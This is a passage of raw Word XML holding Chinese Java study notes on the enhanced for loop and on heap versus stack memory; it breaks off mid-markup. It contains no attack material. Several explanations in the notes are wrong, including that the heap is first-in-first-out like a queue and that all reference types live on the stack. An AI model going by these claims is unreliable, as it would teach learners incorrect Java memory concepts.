        <w:t xml:space="preserve">      for(int x = 10; x &lt; 20; x = x+1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6934D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.print("value of x : " + x );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1C8D0C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.print("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BCBA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A03AF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62027D74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493AAAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入用于数组的增强型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00077908" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明语句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAD4A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7C5BEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码句子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DEFA4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35350ABB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE96899" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E860D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   public static void main(String[] args){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2449A413" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>int [] numbers = {10, 20, 30, 40, 50};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3828306A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for(int x : numbers ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D61F3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.print( x );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49791AA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.print(",");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FFB0F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D34ADB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.print("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F982AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>String [] names ={"James", "Larry", "Tom", "Lacy"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4716F30D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for( String name : names ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56770925" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.print( name );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA6BEF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.print(",");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF8BA23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309913B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411546F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68507D52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆和栈的区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E49BD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存分两种，一种是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>栈内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一种是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>堆内存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B53E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:https://blog.csdn.net/u011546655/article/details/52170470</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0ECC2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BB3BC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里比较关键，看此处笔记时候，应该注意</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF116F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>String str = “abc”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  String str = new String(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的语句是不一样的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509C043" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前者只是创建了一个引用，值可能指向堆中的其他对象的值；后者则没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1221CAB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆内存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569C7FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>什么是堆内存？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3629E6AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆内存是是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存中的一种，它的作用是用于存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象和数组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，当我们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个对象或者创建一个数组的时候，就会在堆内存中开辟一段空间给它，用于存放。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0082D29E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D6961F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>堆内存的特点是什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449E8E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一点：堆其实可以类似的看做是管道，或者说是平时去排队买票的的情况差不多，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>所以堆内存的特点就是：先进先出，后进后出，也就是你先排队，好，你先买票。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22778E80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二点：堆可以动态地分配内存大小，生存期也不必事先告诉编译器，因为它是在运行时动态分配内存的，但缺点是，由于要在运行时动态分配内存，存取速度较慢。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA29605" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B622FA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>对象在堆中如何分配？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CA3053" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机的自动垃圾回收器来管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC84F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈内存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6074F282" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(stack):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个先进后出的数据结构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常用于保存方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>局部变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01884C2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所有基本类型和引用类型都在栈中存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>栈中数据的生存空间一般在当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>scopes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就是由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>括起来的区域</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DF4A37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652F0116" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>什么是栈内存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57499DE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>栈内存是</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的另一种内存，主要是用来执行程序用的，比如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>基本类型的变量</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象的引用变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AA85D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B59D9A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>栈内存的特点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FF4AF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
